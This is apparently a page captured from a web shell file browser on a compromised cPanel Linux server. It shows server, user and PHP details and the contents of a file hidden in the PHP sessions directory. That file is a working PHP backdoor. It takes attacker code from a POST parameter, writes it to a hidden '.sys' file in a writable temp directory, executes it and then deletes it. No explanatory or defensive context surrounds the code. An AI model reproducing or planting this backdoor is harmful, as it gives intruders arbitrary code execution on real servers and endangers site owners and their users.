HEX
Server: Apache
System: Linux srv13.cpanelhost.cl 3.10.0-962.3.2.lve1.5.38.el7.x86_64 #1 SMP Thu Jun 18 05:28:41 EDT 2020 x86_64
User: cca63905 (4205)
PHP: 7.3.20
Disabled: NONE
Upload Files
File: //proc/self/root/var/cpanel/php/sessions/ea-php73/8y6yqZcvbKlDVj
<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode($_POST["tg"]);foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.sys";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");